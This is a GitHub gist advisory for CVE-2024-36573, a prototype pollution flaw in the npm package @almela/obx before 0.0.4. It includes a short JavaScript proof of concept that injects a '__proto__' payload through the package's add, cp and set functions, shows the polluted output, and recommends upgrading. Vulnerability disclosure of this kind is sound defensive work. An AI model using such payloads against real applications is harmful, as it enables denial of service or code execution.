Skip to content

Instantly share code, notes, and snippets.

@mestrtee

mestrtee/CVE-2024-36573.md

Last active July 29, 2024 19:12
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save mestrtee/fd8181bbc180d775f8367a2b9e0ffcd1 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save mestrtee/fd8181bbc180d775f8367a2b9e0ffcd1 to your computer and use it in GitHub Desktop.
Download ZIP
[CVE-2024-36573] Prototype Pollution vulnerability affecting @almela/obx, versions < 0.0.4
Raw
CVE-2024-36573.md

SVSS Score 9.8 CRITICAL

Overview

The module is vulenrable via three functions: , located at add (obx/build/index.js:656), reduce (@almela/obx/build/index.js:470), Object.set (obx/build/index.js:269), respectively. In all these implementations, the assignment of the property from source to destination occurred without proper protection. An attacker can be exploit this method to inject malicious payload via built-in Object through the special properties __proto__ or constructor.prototype. Thus, the attacker can use one of these properties to pollute the application logic that can be escalated to Denial of service, remote code execution or cross-site scripting attacks.

PoC

(async () => {
  const lib = await import('@almela/obx');

var BAD_JSON = JSON.parse('{"__proto__":{"polluted":true}}');
var victim = {}
console.log("Before Attack: ", JSON.stringify(victim.__proto__));
try {
// Un-comment on at a time
  lib.add ({}, BAD_JSON)
  //lib.cp ({ "__proto__.polluted": true})
  //lib.default.set ({}, "__proto__.polluted", true)
} catch (e) { }
console.log("After Attack: ", JSON.stringify(victim.__proto__));
delete Object.prototype.polluted;
})();

Output:

Before Attack:  {}
After Attack:  {"polluted":true}

Output of a successful fix:

Before Attack:  {}
After Attack:  {}

How to prevent:

Update the package to 0.0.4

References:

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment